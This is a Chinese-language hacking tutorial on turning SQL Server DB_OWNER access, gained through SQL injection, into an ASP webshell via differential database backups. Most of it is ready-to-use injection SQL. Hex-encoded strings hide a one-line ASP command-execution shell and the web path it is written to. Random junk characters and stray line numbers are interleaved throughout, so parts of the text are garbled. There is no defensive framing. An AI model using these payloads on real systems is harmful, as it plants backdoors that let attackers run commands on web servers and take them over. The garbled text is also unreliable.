DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:
$ K" r0 q" U. n8 ?3 E: i7 q
减少备份文件大小，得到可执行的webshell成功率提高不少
( x+ u+ m1 z: w! l' H一利用差异备份
' {2 _" t, @0 }5 O9 a3 g+ I加一个参数WITH DIFFERENTIAL
+ {1 K! W8 D6 b5 H' k" ]) I0 d
1
2
; {; U. \9 S. X6 W. f. }1 }3 v3
' [5 \; R2 V3 O& w& O0 Z4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
3 w. F" [  [  E9 f/ ]5 }+ \insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
* H8 J* O6 O" }$ ]! M, G2 A( Bdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

二利用完全FORMAT
加一个参数WITH FROMAT
- G, z, x# R, y7 w有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
$ r7 f( p' s1 y
  q+ W5 [+ t' f# e$ L6 X1 u1
2
7 v  C9 q3 z# {5 L. \0 ?* W3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
( r% ^& \0 }& jinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT

6 s2 n) L8 x1 k/ p- j总的来说就是那么简单几句,下面以备份数据库model为例子
' [, L2 p9 x3 \0 J+ [# }. j$ L1
1 ]. {  F* w) c+ d5 Q" `, {4 x
1
* q- b& B4 @3 t) n id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
3 A- D  T) y/ Q& W, v  Q6 `6 ?' O
. k5 F  f5 k0 C# W2
$ {5 o* w/ m+ P" T. h' b
  R) A! b* b7 N1 a% X5 }& K5 I1
5 Z6 {+ c# B, D" [( O id=1;backup database model to disk='你的路径‘ with differential,format;--
+ Q. O# V8 V  [9 d1 o. V& ?